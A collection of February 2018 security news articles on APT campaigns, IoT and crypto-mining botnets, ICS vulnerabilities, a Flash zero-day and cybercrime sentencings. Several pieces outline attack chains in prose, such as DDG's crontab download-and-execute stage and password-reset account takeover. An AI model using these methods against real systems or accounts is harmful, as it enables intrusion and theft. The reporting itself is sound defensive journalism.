Chinese Iron Tiger APT is back, a close look at the Operation PZChao
3.2.2018 securityaffairs APT

Chinese Iron Tiger APT is back, the new campaign, dubbed by Operation PZChao is targeting government, technology, education, and telecommunications organizations in Asia and the US.
Malware researchers from Bitdefender have discovered and monitored for several months the activity of a custom-built backdoor capable of password-stealing, bitcoin-mining, and of course to gain full control of the victim’s machine.

The campaign, dubbed by Bitdefender, Operation PZChao is targeting government, technology, education, and telecommunications organizations in Asia and the US.

“This is also the case of a custom-built piece of malware that we have been monitoring for several months as it wrought havoc in Asia. Our threat intelligence systems picked up the first indicators of compromise in July last year, and we have kept an eye on the threat ever since.” states the report published by BitDefender.
“An interesting feature of this threat, which drew our team to the challenge of analyzing it, is that it features a network of malicious subdomains, each one used for a specific task (download, upload, RAT related actions, malware DLL delivery). The payloads are diversified and include capabilities to download and execute additional binary files, collect private information and remotely execute commands on the system.”

It is interesting to notice that the malware features a network of malicious subdomains, each one used for a specific task (download, upload, RAT related actions, malware DLL delivery).

The experts who analyzed the command and control infrastructure and malicious codes used by the hackers (i.e. Gh0st RAT) speculate the return of the Iron Tiger APT group.

The Iron Tiger APT (aka Panda Emissary or TG-3390) is active at least since 2010 and targeted organization in APAC, but since 2013 it is attacking high-technology targets in the US.

The experts found many similarities between the Gh0stRat samples used in the Operation PZChao and the ones used in past campaigns associated with the Iron Tiger APT.

Attackers behind the Operation PZChao targeted victims with spear-phishing messages using a malicious VBS file attachment that once executed will download the malicious payloads to Windows systems from a distribution server. The researchers determined the IP address of the server, it is “” in South Korea and hosts the “”.

Experts highlighted that new components are downloaded and executed on the target system in every stage of the attack.

Operation PZChao

The experts discovered that the first payload dropped onto compromised systems is a bitcoin miner.

The miner is disguised as a ‘java.exe’ file and used every three weeks at 3 am to avoid being noticed while mining cryptocurrency likely to fund the campaign.

But don’t forget that the main goal of the Operation PZChao is cyber espionage, the malicious code leverages two versions of the Mimikatz tool to gather credentials from the infected host.

The most important component in the arsenal of the attacker remains the powerful Gh0sT RAT malware that allows controlling every aspect of the infected system.

“this remote access Torjan’s espionage capabilities and extensive intelligence harvesting from victims turns it into an extremely powerful tool that is very difficult to identify,” concluded Bitdefender. “The C&C rotation during the Trojan’s lifecycle also helps evade detection at the network level, while the impersonation of legitimate, known applications takes care of the rest.”

Does The U.S. Need a National Cybersecurity Safety Board?
2.2.2018 securityweek BigBrothers
It is time, suggest two academics from Indiana University-Bloomington, for Congress to establish a National Cybersecurity Safety Board (NCSB) as an analogue of the National Transportation Safety Board (NTSB), to improve the level of cybersecurity in the U.S.

The argument is that the NTSB helped to improve the safety of air travel while still stimulating growth and innovation in the industry. "Today," they say in a paper published this week, "air travel is widely regarded as among the safest forms of mass transportation. Can the same feat be replicated in cyberspace?"

Scott J. Shackelford JD, PhD, and Austin E. Brady argue, in their paper "Is it Time for a National Cybersecurity Safety Board? Examining the Policy Implications and Political Pushback' that it is both time, and possible (although not immediately probable). "A NCSB is politically unlikely in the near term, but we believe that the creation of such a body is overdue... All that is needed is the political will to act, the desire to experiment with new models of cybersecurity governance, and the recognition that we should learn from history."

The paper argues that there have been many propositions for strengthening U.S. cybersecurity, "from federally sponsored cyber risk insurance programs to allowing companies to have a freer hand to engage in proactive cybersecurity measures." The former would allow the insurer to impose cybersecurity conditions, while the latter would allow 'active defense' or even the right to 'hack back' . Across most of these proposals, it suggests, "are more robust data breach investigation requirements."

This connection is not clearly established in the paper, although it precisely aligns with the transportation functions of the NTSB. The argument is that we can better prevent future cybersecurity breaches by more fully understanding past breaches, and that this process needs to be established by government.

There is an alternative model for improving cybersecurity that is not mentioned in this paper: an American Cybersecurity Association (ACA) that uses the American Medical Association (AMA) as the model. This argument argues that professionalizing the cybersecurity workforce in the same way that the AMA professionalized the medical profession would raise the standard and quality of organizations' cybersecurity.

The ACA approach has been described by Martin Zinaich, Information Security Officer at the City of Tampa, FL. In his paper, 'What does Information Security have in common with Eastern Air Lines Flight 401?', he argues, "The AMA accelerated the professionalization of medicine and the establishment of minimum standards in medical training, education and apprenticeship requirements to gain entry to the profession. The same could and should be done in the Information Security field with a similar cybersecurity national body and professional associations."

The difference between the two approaches is that one imposes regulations from outside of the profession, while the other generates standards from within the profession. Both, however, suffer from inertia, and Shackelford and Brady argue that Congress should force the issue by establishing a national safety board.

"Such a model would be an improvement on the existing reliance on Cyber Emergency Response Teams (CERTs), and aide in effective policy making at both the state and federal level given the lack of hard, verifiable data on the scope and scale of cyber attacks. The creation of a NCSB could also help law enforcement investigations, particularly local and state agencies without the resources and expertise of the FBI. Along with the ISACs, this would be a boon to academics needing reliable data to undertake scholarly analysis, as well as national security organizations, and U.S. strategic partners around the world."

Interestingly, the authors spend some time looking at the European cybersecurity model depicted by the General Data Protection Regulation (GDPR) and the Network Information Systems Directive (NISD) both coming into force in May 2018. "Although neither the GDPR nor the NIS Directive includes a version of a regional Cybersecurity Safety Board, the elements it does include moves the EU in this direction, which could make an analogous U.S. body that much more effective," they write. "Such developments would be an important step on the long journey to a positive and sustainable cyber peace."

However, GDPR is far removed from any form of a national cybersecurity safety board. The authors say, "it centralizes data protection authority in the EU into a single regulatory body, as compared with the EU Data Privacy Directive’s (DPD) utilization of national data protection authorities for each Member State." This isn't strictly true -- each member state will retain its own regulatory body, and there are many areas within the regulation where national transposition has a degree of flexibility over implementation and interpretation. While GDPR is a unifying force, its application will still vary slightly between different member states.

Such minor differences are likely to be exacerbated by the concept of national security -- which again varies between different member states. "The extent of some of these obligations, however, is still unclear, as States may see cyber threats as falling in the realm of national security, and therefore outside the scope of this strata of EU governance," note the authors.

The interplay between national security and cybersecurity is not discussed within this paper; and yet it is fundamental to the way in which any overarching regulation -- whether the EU's GDPR or a proposed U.S. NCSB -- can actually operate. In the name of national security there will always be areas where intelligence agencies, and politicians, will seek to keep the true nature of events secret. There is likely to be considerable pushback from the intelligence agencies against any national body that has the independence of the NTSB, and the independence proposed for an NCSB.

How, for example, could an NCSB handle an investigation into a breach such as the Belgacom telco hack that was revealed in 2013? According to leaked documents (Snowden) it was undertaken by GCHQ using the NSA's 'quantum insertion' technology.

Martin Zinaich certainly has his concerns over an NCSB. "I support anything that might solidify a structuring of Information Security into a normalized business risk profile," he told SecurityWeek. "However, it seems to me a National Cybersecurity Safety Board might not be the best place to start. I also do not think a NCSB could be agile enough to keep pace.

"If there is one area where Cyber Security professionals excel," he continued, "it is in the identification of cyber-attacks and breaches. Too often, the cause is not a mystery where an investigative body would expose an unknown risk that could then be shared to make the industry safer (as does the current NTSB). No, too often the cause is well-known and age old. Take the 2017 Equifax breach. The vector was an Apache Struts vulnerability that had already been patched but the patch was not applied (and there are a lot of non-technical reasons why that can be so)."

Zinaich retains his belief that the best way to improve cybersecurity is by professionalizing the practitioners. "The issue is the integration of Information Security into the business at a level where it has an impact -- be the business a manufacturer of IoT devices or a credit lending institution. I still hold that professionalizing this field is the place to start, but I predict legislation will come first."

While there are strong arguments, as outlined in this paper, for the formation of a National Cybersecurity Safety Board, it is probably not achievable in the current geopolitical climate. Similarly, while there are strong arguments in favor of an American Cybersecurity Association, existing practitioners are generally too busy firefighting cybersecurity incidents to get it started.

The greater likelihood is that the current tendency for government to impose regulations to improve cybersecurity will probably just continue and gather pace.

Web Server Used in 100 ICS Products Affected by Critical Flaw
2.2.2018 securityweek ICS
A critical vulnerability that could allow a remote attacker to execute arbitrary code has been found in a component used by more than 100 industrial control systems (ICS) from tens of vendors.

The flaw affects the web server component of 3S-Smart Software Solutions’ CODESYS WebVisu product, which allows users to view human-machine interfaces (HMIs) for programmable logic controllers (PLCs) in a web browser.

According to the CODESYS website, the WebVisu product is used in 116 PLCs and HMIs from roughly 50 vendors, including Schneider Electric, WAGO, Hitachi, Advantech, Beck IPC, Berghof Automation, Hans Turck, and NEXCOM.

Zhu WenZhe of Istury IOT discovered that the CODESYS web server is affected by a stack-based buffer overflow vulnerability that could allow an attacker to cause a denial-of-service (DoS) condition and possibly even execute arbitrary code on the web server.

“A crafted web server request may cause a buffer overflow and could therefore execute arbitrary code on the web server or lead to a denial-of service condition due to a crash in the web server,” 3S-Smart Software Solutions explained in an advisory.

The vendor says that while there is no evidence that the flaw has been exploited in the wild, even an attacker with low skill may be able to exploit it remotely.

Related: Learn More at SecurityWeek’s ICS Cyber Security Conference

The vulnerability is tracked as CVE-2018-5440 and it has been assigned a CVSS score of 9.8. CODESYS v2.3 web servers running on any version of Windows (including Windows Embedded Compact) as stand-alone or part of the CODESYS runtime system prior to version are affected. Version, which is also part of the CODESYS setup, patches the vulnerability.

While 3S-Smart Software Solutions says it has not identified any workarounds for this security hole, the company has advised organizations to ensure that access to controllers is restricted through minimization of network exposure, and the use of firewalls and VPNs. The company has also published a white paper with general recommendations on security in industrial control applications.

Vulnerabilities in CODESYS components are not uncommon. Last April, industrial cybersecurity startup CyberX uncovered several critical flaws in the CODESYS web server. More recently, SEC Consult reported that a CODESYS component flaw exposed PLCs from WAGO and possibly other vendors to attacks.

Shodan has been crawling port 2455, which is specific to the CODESYS protocol, since 2014. The search engine currently shows more than 5,600 systems reachable via this port, with a majority in the United States, Germany, Turkey, China and France.

Shodan map shows CODESYS devices

New Botnet Is Recruiting IoT Devices
2.2.2018 securityweek BotNet
A new botnet is recruiting Internet of Things (IoT) devices by exploiting two vulnerabilities already popular among IoT botnets, Radware has discovered.

Dubbed JenX, the threat is abusing the CVE-2014-8361 (Realtek SDK Miniigd UPnP SOAP Command Execution) and CVE-2017–17215 (Huawei Router HG532 – Arbitrary Command Execution) vulnerabilities. Both of these security issues were previously abused by the Mirai variant Satori.

The new threat also uses techniques associated with the recently detailed PureMasuta variant of Mirai, which recently had its source code published on an invite-only dark forum.

The botnet’s command and control (C&C) server also provides gaming mod servers and distributed denial of service (DDoS) services, Radware's researchers discovered.

The DDoS feature includes attack vectors such as Valve Source Engine Query and 32bytes floods, TS3 scripts, and a Down OVH option (likely a reference the Mirai attack on a cloud hosting provider OVH in September 2016). The miscreants guarantee attack volumes of 290-300Gbps, supposedly leveraging the power of the new botnet.

JenX uses servers to perform the scanning and exploit operations, unlike previously observed IoT botnets such as Mirai, Hajime, Persirai, Reaper, Satori, and Masuta, which leverage infected systems for scanning and exploiting (which also fuels an exponential growth of the botnet).

Because it does not include scanning and exploit payloads, JenX’ code is unsophisticated and lighter on the delivery, Radware says. With centralized scan and exploit functionality, the operators also have increased flexibility to expand and improve the functionality without impacting the size of the bot.

Because there are fewer nodes scanning and exploiting, the botnet is less noisy and can better avoid being detected by honeypots. This also makes it more difficult to estimate the botnet’s size, without accessing the C&C server, the security researchers say. On top of that, the botnet only impacts the victim’s network connection when instructed to perform an attack.

“The drawback of the central approach is a less than linear growth with the number of deployed servers. Much slower compared to the exponential growth rate of and less aggressive than distributed scanning botnets,” Radware notes.

The malware is protected with anti-debugging detection and its binary forks three processes obfuscated in the process table much like Mirai. All processes listen to a port bound to localhost while one opens a TCP socket to the C&C at on port 127. The bot uses XOR obfuscation with the exact same key used in PureMasuta.

When executed, the malware connects to the C&C server located by the hostname ‘’ using the TCP session (the domain is registered to Calvos S.L.). The server supposedly provides a command line interface.

The code has indicators of a Valve Source Engine Query attack payload, likely because of the GTA San Andreas multiplayer servers on the domain. The attack vector was included in the original Mirai code that went public in October 2016, and Radware believes the botnet is being built by the San Calvicie hacker group and served through their Clearnet website.

“Unless you frequently play GTA San Andreas, you will probably not be directly impacted. The botnet is supposed to serve a specific purpose and be used to disrupt services from competing GTA SA multiplayer servers. I do not believe that this will be the botnet that will take down the internet! But it does contain some interesting new evolutions and it adds to a list of IoT botnets that is growing longer and faster every month,” Radware’s Pascal Geenens note.

Two providers informed on the issue have already taken down the exploit servers hosted in their datacenters, but some servers remain active and the botnet is still operational, Geenens says. However, should the attackers decide to move their exploit servers to the darknet, the botnet’s takedown would be much more difficult, as was the case with BrickerBot.

“JenX, in particular, can be easily concealed and hardened against takedowns. As they opted for a central scan and exploit paradigm, the hackers can easily move their exploit operations to bulletproof hosting providers who provide anonymous VPS and dedicated servers from offshore zones. These providers do not care about abuse,” Geenens says.

Hundreds of ICS products affected by a critical flaw in CODESYS WebVisu
2.2.2018 securityaffairs ICS

Researcher discovered a critical vulnerability in the web server component of 3S-Smart Software Solutions’ CODESYS WebVisu product currently used in 116 PLCs and HMIs from many vendors,
Security researcher Zhu WenZhe from Istury IOT discovered a critical stack-based buffer overflow vulnerability in the web server component of 3S-Smart Software Solutions’ CODESYS WebVisu product that allows users to view human-machine interfaces (HMIs) for programmable logic controllers (PLCs) in a web browser.

The vulnerability is tracked as CVE-2018-5440 and it has been assigned a CVSS score of 9.8, and the worst news is that it is quite easy to exploit.

The WebVisu product is currently used in 116 PLCs and HMIs from many vendors, including Schneider Electric, Hitachi, Advantech, Berghof Automation, Hans Turck, and NEXCOM.

An attacker can remotely trigger the flaw to cause a denial-of-service (DoS) condition and under some conditions execute arbitrary code on the web server.

“A crafted request may cause a buffer overflow and could therefore execute arbitrary code on the web server or lead to a denial-of-service condition due to a crash in the web server. ” reads the security advisory issued by CODESYS.

According to CODESYS, there is no evidence that the flaw has been exploited in the wild.

The flaw affects all Microsoft Windows (also WinCE) based CODESYS V2.3 web servers running stand-alone or as part of the CODESYS runtime system prior version V1.1.9.19.

The company has released the CODESYS web server V. for CODESYS V2.3 to
address the flaw. This is also part of the CODESYS setup V2.3.9.56.

The vendor also recommends organizations to restrict access to controllers, use firewalls to control the accesses and VPNs.

In December 2017, security researchers at SEC Consult discovered a flaw in version of the CODESYS runtime which is included on PFC200s with firmware version 02.07.07. The CODESYS runtime is commonly included on PLCs to allow for easy programming by users. 17 models of WAGO PFC200 Series PLC were found vulnerable to remote exploit.

A PLC flaw can be a serious threat to production and critical infrastructure

Back to the present, querying the Shodan search engine for port 2455 used by CODESYS protocol we can find more than 5,600 systems are exposed online, most of them in the United States, Germany, Turkey, and China.


DDG, the second largest mining botnet targets Redis and OrientDB servers
2.2.2018 securityaffairs BotNet

Researchers at Qihoo 360’s Netlab analyzed a new campaign powered by the DDG botnet, the second largest mining botnet of ever, that targets Redis and OrientDB servers.
A new Monero-mining botnet dubbed DDG was spotted in the wild, the malware targets Redis and OrientDB servers.

According to the researchers at Qihoo 360’s Netlab, the DDG botnet was first detected in 2016 and is continuously updated throughout 2017.

“Starting 2017-10-25, we noticed there was a large scale ongoing scan targeting the OrientDB databases. Further analysis found that this is a long-running botnet whose main goal is to mine Monero CryptoCurrency. We name it DDG.Mining.Botnet after its core function module name DDG.” reads the analysis published by Netlab.

The miner has already infected nearly 4,400 servers and has mined over $925,000 worth of Monero since March 2017, DDG is among the largest mining botnets.

Yesterday I wrote about the greatest mining botnet called Smominru that has infected over 526,000 Windows machines, its operators had already mined approximately 8,900 Monero ($2,346,271 at the current rate).

The malware exploits the remote code execution vulnerability CVE-2017-11467 to compromise OrientDB databases and targets Redis servers via a brute-force attack.

Crooks are focusing their efforts on attacks against servers that usually have significant computing capabilities.

The attack chain described by the researchers from Qihoo 360’s Netlab is composed of the following steps:

Initial Scanning: The attacker (ss2480.2) exploits the known RCE vulnerability of the OrientDB database and drops the attack payload
Stage 1: Attackers modify local Crontab scheduled tasks, download and execute (hxxp: // on the primary server and keep it synchronized every 5 minutes
Stage 2: DDG traverses the built-in file hub_iplist.txt, check the connectivity of every single entry and try to download the corresponding Miner program wnTKYg from the one can be successfully connected (wnTKYg.noaes if the native CPU does not support AES-NI)
Mining Stage: The Miner program begins to use the computing resources of the compromised host to begin mining for the attacker’s wallet.
The following image shows the DDG Mining Botnet attack process:

DDG botnet
The researchers conducted sinkholing of the botnet traffic and observed 4,391 IP addresses of compromised servers from all countries. Most of the infections is in China (73%), followed by the United States (11%), the botnet is mainly composed of compromised Redis databases (88%).

Cybercriminals are using three wallet addresses, the botnet mined 3,395 Monero ($925,000), but researchers also discovered another wallet containing 2,428 Monero ($660,000).

“The total income is Monroe 3,395 or 5,760. These tokens are worth USD 925,383 or 1,569,963 today. Note: There is an issue for the second wallet, where “Total Paid” is not consistent with the summary of all tractions’ amount. We cannot confirm which number is more accurate, so we show both numbers here.” continues the analysis.

Further information including the IoCs are included in the technical report published by Qihoo 360’s Netlab.

It's Time For Machine Learning to Prove Its Own Hype
2.2.2018 securityweek IT

Machine Learning in Cybersecurity

Machine Learning is a Black Box that is Poorly Understood

2017 was the year in which 'machine learning' became the new buzzword -- almost to the extent that no new product could be deemed new if it didn't include machine learning.

Although the technology has been used in cybersecurity for a decade or more, machine learning is now touted as the solution rather than part of the solution.

But doubts have emerged. Machine learning is a black box that is poorly understood; and security practitioners like to know exactly what it is they are buying and using.

The problem, according to Hyrum Anderson, technical director of data science at Endgame (a vendor that employs machine learning in its own endpoint protection product), is that users don't know how it works and therefore cannot properly evaluate it. To make matters worse, machine learning vendors do not really understand what their own products do -- or at least, how they come to the conclusions they reach -- and therefore cannot explain the product to the satisfaction of many security professionals.

The result, Anderson suggests in a blog post this week, is "growing veiled skepticism, caveated celebration, and muted enthusiasm."

It's not that machine learning doesn't work -- it clearly does. But nobody really understands how it reaches its decisions.

Anderson quotes Ali Rahimi. "He compared some trends, particularly in deep learning, to the medieval practice of Alchemy. 'Alchemy ‘worked’,' Ali admitted. 'Alchemists invented metallurgy, ways to dye textiles, our modern glass-making processes, and medications. Then again, Alchemists also believed they could cure diseases with leeches, and turn base metals into gold'."

"If the physicist’s mantra is Feynman’s 'What I cannot create, I do not understand'," he continues, "then the infosec data scientist should adopt, 'What cannot be understood, should be deployed with care.' Implied, but not spoken, is 'if at all'.

This problem of not understanding how a conclusion is reached could become much worse if a possible interpretation of Article 22 of the EU's General Data Protection Regulation (GDPR) is enforced to its full potential. This states, "The data subject shall have the right not to be subject to a decision based solely on automated processing, including profiling, which produces legal effects concerning him or her or similarly significantly affects him or her."

This should not directly affect machine-learning malware detection because data subjects are not directly involved, but could have implications for other applications used by both IT and security departments.

GDPR's Recital 71 clarifies the requirement. It adds, "In any case, such processing should be subject to suitable safeguards, which should include specific information to the data subject and the right to obtain human intervention, to express his or her point of view, to obtain an explanation of the decision reached after such assessment and to challenge the decision."

Right now, suggests Anderson, this would be largely impossible. "The point is that although some models may reach impressive predictive performance, it may not be clear what information in the data directly determine the decisions. Ironically, machine learning is such that even with full access to the source code and data, it may still be very difficult to determine 'why' a model made a particular decision."

A partial solution for infosec practitioners would come from the increased involvement of the machine learning industry with third party testing. This would at least enable the practitioners to understand how effective the algorithms are, even if not how they work. Although some machine-learning, so-called next-gen, endpoint protection vendors have been slow and reluctant to embrace third-party testing, Endgame is not one of them.

"Fortunately," writes Anderson, "there are technique-agnostic methods to compare solutions. We have previously argued that AV can be compared apples-to-apples to ML by comparing both false positive and true positive rates, for example, whereas 'accuracy' is wholly inadequate and may hide all manner of sins... In the endpoint security space, vendors are beginning to offer holistic breach tests rather than AV-only tests, which help customers value a broader protection landscape."

But ultimately, it is the lack of visibility into the working of machine learning and AI algorithms that must change. "My call for 2018," says Anderson, "is to continue to address what is still particularly needed in ML infosec research: more cross-pollination between academia and industry, more open community engagement from security vendors, and more open datasets for reproducible research. By doing this, we’ll continue to move ML in infosec from the dark arts of Alchemy to rigorous Science."

Endgame was founded in 2008 by Chris Rouland and other executives who previously worked with the CIA and Internet Security Systems. It originally discovered and sold 0-day vulnerabilities, but shifted away from this around 2014. Under current CEO Nate Fick's leadership, it has grown its commercial offering using more than $100 million in funding, including a $23 million Series B funding round in March 2013 followed by a $30 million Series C round in November 2014.

Crypto-Mining Botnet Ensnares 500,000 Windows Machines
2.2.2018 securityweek BotNet
Focused on mining Monero crypto-currency, a new botnet has managed to ensnare over half a million machines to date, Proofpoint reports.

Dubbed Smominru, the botnet managed to infect over 526,000 Windows hosts to date, most of which are believed to be servers. After conducting a sinkholing operation, the security researchers discovered that the infected machines are distributed worldwide, with the highest numbers in Russia, India, and Taiwan.

The Monero miner, which is also known as Ismo, has been observed since the end of May 2017 spreading via EternalBlue, the National Security Agency-linked exploit that targets a vulnerability (CVE-2017-0144) in Windows’ Server Message Block (SMB) on port 445. The exploit was previously used in other global attacks, including WannaCry and NotPetya.

The miner itself has been detailed numerous times before, and was associated with various attacks, including those perpetrated by an established Chinese crime group (Hex Men).

What makes it stand out in the crowd is the use of Windows Management Infrastructure for infection, a method recently noticed in the WannaMine crypto-mining worm too (which also uses EternalBlue to spread).

The hash power associated with the Monero payment address for Smominru reveals that the botnet was likely twice the size of Adylkuzz, the first crypto-mining botnet to abuse EternalBlue. According to Proofpoint, Smominru’s operators already mined around 8,900 Monero (between $2.8 million and $3.6 million), at a rate of around 24 Monero per day.

In a recent report diving into the huge financial gains crypto-miner operators register, Talos revealed that an adversary controlling 1,000 systems would make around $90,000 per year. The security firm also says it “has observed botnets consisting of millions of infected systems,” which “could be leveraged to generate more than $100 million per year theoretically.”

While investigating Smominru, Proofpoint discovered that at least 25 of the hosts were attempting to infect new machines via EternalBlue (the hosts are placed behind the network autonomous system AS63199).

Last week, NetLab 360 security researchers published a post on what they call the MyKings botnet, which appears to be none other than Smominru, based on the used Monero address. NetLab revealed that the mining operation was performed by a sub-botnet, while another was focused on scanning and spreading, capable of mobilizing over 2400 host IP addresses.

According to Proofpoint, some of the distribution attacks are likely performed using MySQL, while others supposedly leverage the NSA-linked exploit EsteemAudit (CVE-2017-0176).

Both NetLab and Proofpoint findings fall in line with GuardiCore’s report on the Hex Men, a group using three malware families, namely Hex, Hanako and Taylor, each targeting different SQL servers with its own goals, scale and target services.

The botnet’s command and control (C&C) infrastructure is hosted behind SharkTech, Proofpoint’s security researchers have discovered. The company was informed on the issue.

MineXMR was also contacted regarding the Monero address associated with Smominru, and the mining pool banned the address. This prompted the botnet operators to register new domains and mining to a new address on the same pool. This switch apparently resulted in the operators losing control over one third of the bots.

“Because most of the nodes in this botnet appear to be Windows servers, the performance impact on potentially critical business infrastructure may be high, as can the cost of increased energy usage by servers running much closer to capacity. The operators of this botnet are persistent, use all available exploits to expand their botnet, and have found multiple ways to recover after sinkhole operations,” Proofpoint notes.

The use of standalone coin miners and coin mining modules in existing malware has proliferated rapidly over the past year, fueled by the surge in value crypto-coins such as Bitcoin and Monero have registered. With Bitcoin resource-intensive to mine outside of dedicated mining farms, Monero has registered massive interest from cybercriminals.

Smominru’s operators have likely registered significant profits from their operation and the resilience of the botnet and its infrastructure suggest that the activities will continue, the researchers say. The potential impacts on infected nodes will continue as well, and other botnets featuring similar purpose and methods might emerge as well, the researchers say.

“We repeatedly see threat actors ‘follow the money’ - over the last several months, the money has been in cryptocurrency and actors are turning their attention to a variety of illicit means to obtain both Bitcoins and alternatives,” Kevin Epstein, VP Threat Operations, Proofpoint, said in an emailed comment.

“This Monero mining botnet is extremely large, made up mostly of Microsoft Windows servers spread around the globe. Taking down the botnet is very difficult given its distributed nature and the persistence of its operators. For businesses, preventing infection through robust patching,” Epstein concluded.

The Price of Cybercrime: 9 Years in One Case, 6 Months in Another
2.2.2018 securityweek Crime
Travon Williams, 33, was sentenced by the District Court for the Eastern District of Virginia to 9 years in jail for his role in a credit card fraud and identity theft scheme.

For more than two years, Williams led a gang that purchased thousands of stolen credit and debit card numbers from the dark web. The numbers were then encoded onto fraudulent cards and used to purchase merchandise such as gift cards and cigarette cartons. The cigarettes were sold on to buyers from New York City, who drove down to Northern Virginia to transport the cigarettes.

Williams is one of 12 defendants arrested in August 2017. He obtained $415,000 in proceeds from his crimes.

All 12 defendants have pleaded guilty for their roles in the scheme. Williams is the sixth to have been sentenced. The remaining six are due to be sentenced in February and March.

One day earlier, Thursday, Jan. 25, the DOJ announced that Jonathan Powell had been sentenced to six months in jail, 2 years supervised release and a restitution payment of $278,855 for computer fraud. He had obtained access to more than 1,000 email accounts from a New York City university in order to download sexually explicit photos and videos.

Powell had earlier pleaded guilty to the charge on August 9, 2017 in Manhattan federal court.

"Jonathan Powell used his computer skills to breach the security of a university to gain access to their students’ personal accounts," said U.S. Attorney Geoffrey S. Berman. "Once Powell had access, he searched the accounts for compromising photos and videos."

Specifically, he used the password reset utility to change email account passwords. He then used control over the email accounts to request password resets for the victims' online accounts such as iCloud, Facebook, Google, LinkedIn and Yahoo. "POWELL then logged into the Linked Accounts and searched within the Linked Accounts, gaining access to private and confidential content stored in the Linked Accounts," reports the DOJ announcement. "In one instance, POWELL searched a University-1 student’s linked Gmail account for digital photographs and for various lewd terms."

Subsequent analysis of logs showed that Powell had accessed the password reset utility approximately 18,640 times between October 2015 and September 2016, attempting 18,600 password changes in connection with more than 2000 unique email accounts -- succeeding in making 1378 changes to 1035 unique accounts.

After his arrest, he admitted to compromising email accounts at other educational institutions in Arizona, Florida, Ohio and Texas.

Researchers discovered several zero-day flaws in ManageEngine products
2.2.2018 securityaffairs

Security experts at Digital Defense have discovered several vulnerabilities in the products of the Zoho-owned ManageEngine.
The list of vulnerabilities discovered includes a flaw that could be exploited by an attacker to take complete control over the vulnerable application.

The flaws affect ServiceDesk Plus, Service Plus MSP, OpManager, Firewall Analyzer, Network Configuration Manager, OpUtils and NetFlow Analyzer.

ManageEngine has more than 40,000 customers worldwide and provides complete solutions for IT management.

manageengine products

One of the vulnerabilities affects the ManageEngine ServiceDesk Plus help desk software, the experts discovered an unauthenticated file upload flaw that could be exploited by an attacker to upload a JavaScript web shell and use it to execute arbitrary commands with SYSTEM privileges.

Researchers also discovered several blind SQL injection vulnerabilities that could be triggered by an unauthenticated attacker to take complete control of an application.

These ManageEngine products are also affected by an enumeration flaw that can be exploited to access user personal data, including usernames, phone numbers, and email addresses.

“[Digital Defense] announced that its Vulnerability Research Team (VRT) uncovered multiple, previously undisclosed vulnerabilities within several ManageEngine products, allowing unauthenticated file upload, blind SQL injection, authenticated remote code execution and user enumeration, potentially revealing sensitive information or full compromise of the application.” reads the press release issued by the company.

“Application layer vulnerabilities continue to be a key area of focus for software vendors,” said Mike Cotton, vice president of engineering at Digital Defense. “We are pleased to work collaboratively with affected vendors to facilitate prompt resolution, ensuring our clients and enterprises are protected from any potential exploitation of these vulnerabilities.”

ManageEngine promptly released security updates to address the vulnerabilities discovered by researchers at Digital Defense report.

(Unpatched) Adobe Flash Player Zero-Day Exploit Spotted in the Wild
2.2.2018 thehackernews 

Another reason to uninstall Adobe Flash Player—a new zero-day Flash Player exploit has reportedly been spotted in the wild by North Korean hackers.
South Korea's Computer Emergency Response Team (KR-CERT) issued an alert Wednesday for a new Flash Player zero-day vulnerability that's being actively exploited in the wild by North Korean hackers to target Windows users in South Korea.
Simon Choi of South Korea-based cybersecurity firm Hauri first reported the campaign on Twitter, saying the North Korean hackers have been using the Flash zero-day against South Koreans since mid-November 2017.
Although Choi did not share any malware sample or details about the vulnerability, the researcher said the attacks using the new Flash zero-day is aimed at South Korean individuals who focus on researching North Korea.
Adobe also released an advisory on Wednesday, which said the zero-day is exploiting a critical 'use-after-free' vulnerability (CVE-2018-4878) in its Flash media software that leads to remote code execution.

The critical vulnerability affects Adobe Flash Player version and earlier versions for:
Desktop Runtime (Win/Mac/Linux)
Google Chrome (Win/Mac/Linux/Chrome OS)
Microsoft Edge and Internet Explorer 11 (Win 10 & 8.1)
"Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users," the advisory said. "These attacks leverage Office documents with embedded malicious Flash content distributed via email. Adobe will address this vulnerability in a release planned for the week of February 5."
To exploit the vulnerability, all an attacker need to do is trick victims into opening Microsoft Office documents, web pages, or spam messages that contain a maliciously crafted Adobe Flash file.
The vulnerability can be leveraged by hackers to take control of an affected computer.
Choi also posted a screenshot to show that the Flash Player zero-day exploit has been delivered via malicious Microsoft Excel files.
Adobe said in its advisory that the company has planned to address this vulnerability in a "release planned for the week of February 5," through KR-CERT advises users to disable or completely remove the buggy software.

Meltdown/Specter-based Malware Coming Soon to Devices Near You, Are You Ready?
2.2.2018 thehackernews  Safety

It has been few weeks since the details of the Spectre, and Meltdown processor vulnerabilities came out in public and researchers have discovered more than 130 malware samples trying to exploit these chip flaws.
Spectre and Meltdown are security vulnerabilities disclosed by security researchers earlier this month in many processors from Intel, ARM and AMD used in modern PCs, servers and smartphones, among other devices.
These CPU vulnerabilities could enable attackers to bypass memory isolation mechanisms and access everything, including memory allocated for the kernel containing sensitive data like passwords, encryption keys and other private information.
Researchers from independent antivirus testing firm AV-TEST detected at least 139 malware samples, as of today, which are related to these CPU vulnerabilities, as shown in the growth graph.
You can find SHA256 hashes for all malware samples here.

Meanwhile, cybersecurity firm Fortinet also tracked and analyzed many malware samples 'trying to exploit' recently disclosed CPU vulnerabilities, most of which includes re-compiled or extended version of the JavaScript-based proof-of-concept (PoC) exploit released last month.
"The rate at which the cybercriminal community is targeting known vulnerabilities is clearly accelerating, with the WannaCry and NotPetya exploits serving as perfect examples of the need to patch vulnerable systems as soon as possible," Fortinet said.
"Which is why our concerns were raised when we recently learned about some of the largest vulnerabilities ever reported—ones that affect virtually every processor developed since 1995 by chip manufacturers Intel, AMD, and ARM."
Another news makes this situation, even more, worse—Intel halted all its CPU firmware patches for the Meltdown and Spectre flaws last week after it caused issues like spontaneous reboots and other 'unpredictable' system behaviour on affected PCs.
So, until Intel and other vendors do not come up with stable security patches for the Meltdown and Spectre attacks that don’t cause systems to break, users are recommended to keep their operating system, web browsers, antivirus and other software up-to-date.

Increasing Number of Industrial Systems Accessible From Web: Study
2.2.2018 securityweek ICS
The number of industrial control systems (ICS) accessible from the Internet has increased significantly in the past year, reaching more than 175,000 components, according to a new report from Positive Technologies.

Using the Shodan, Censys and Google search engines, researchers identified 175,632 ICS components accessible from the Web. In comparison, similar searches conducted in the previous year uncovered just over 162,000 systems.

